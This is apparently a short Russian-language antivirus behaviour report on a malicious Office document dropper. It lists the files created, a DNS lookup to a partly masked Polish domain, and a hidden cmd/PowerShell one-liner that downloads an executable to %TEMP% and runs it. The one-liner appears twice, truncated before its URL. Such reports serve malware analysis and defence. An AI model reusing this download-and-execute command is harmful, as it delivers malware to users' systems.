Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $dankv как %temp%\eubsuqqrb.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Wshex([String] $dankv){(New-Object System.Net.WebClient).DownloadFile($dankv,''%TEMP%\Eubsuqqrb.exe'');Start-Process ''%TEMP%\Eubsuqqrb.exe'';}try{Wshex(''...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1884
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\application data\microsoft\forms\winword.box
- %TEMP%\sicgyqs2.bat
- %TEMP%\1200521.cvr
Сетевая активность
UDP
- DNS ASK ja###ol.com.pl
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function Wshex([String] $dankv){(New-Object System.Net.WebClient).DownloadFile($dankv,''%TEMP%\Eubsuqqrb.exe'');Start-Process ''%TEMP%\Eubsuqqrb.exe'';}try{Wshex(''...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Sicgyqs2.bat" "' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Sicgyqs2.bat" "
